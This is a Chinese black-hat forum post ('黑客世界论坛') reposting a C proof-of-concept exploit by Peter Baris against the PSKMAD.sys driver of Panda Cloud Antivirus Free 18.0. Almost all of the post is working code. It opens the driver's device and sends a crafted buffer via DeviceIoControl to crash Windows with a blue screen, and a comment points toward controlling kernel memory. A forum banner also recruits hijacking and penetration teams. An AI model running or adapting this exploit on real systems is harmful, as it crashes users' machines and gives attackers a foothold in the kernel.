跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Panda Free Antivirus - 'PSKMAD.sys' Denial of Service

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/

#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>


#define DEVICE_NAME L"\\\\.\\PSMEMDriver"

LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
	HANDLE hFile = NULL;

	hFile = CreateFile(FileName,
		GENERIC_READ | GENERIC_WRITE,
		0,
		0,
		OPEN_EXISTING,
		NULL,
		0);

	return hFile;
}

int main()
{

	HANDLE hFile = NULL;
	PVOID64 lpInBuffer = NULL;
	ULONG64 lpBytesReturned;
	PVOID64 BuffAddress = NULL;
	SIZE_T BufferSize = 0x800;
	
	printf("Trying the get the handle for the PSMEMDriver device.\r\n");
	
	hFile = GetDeviceHandle(FileName);

	if (hFile == INVALID_HANDLE_VALUE) {
		printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
		return 1;
	}

	// Allocate memory for our buffer
	lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	

	if (lpInBuffer == NULL) {
		printf("VirtualAlloc() failed. \r\n");
		return 1;
	}
	

	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
	*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
	*(PULONG64)BuffAddress = (ULONG64)0x42424242;
	BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
	
	RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);



		DeviceIoControl(hFile,
			0xb3702c38,
			lpInBuffer,
			NULL,  //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
			NULL,
			NULL,
			&lpBytesReturned,
			NULL);

	/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
	printf("Cleaning up.\r\n");
	VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
	CloseHandle(hFile);
	printf("Resources freed up.\r\n");
    return 0;
}

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。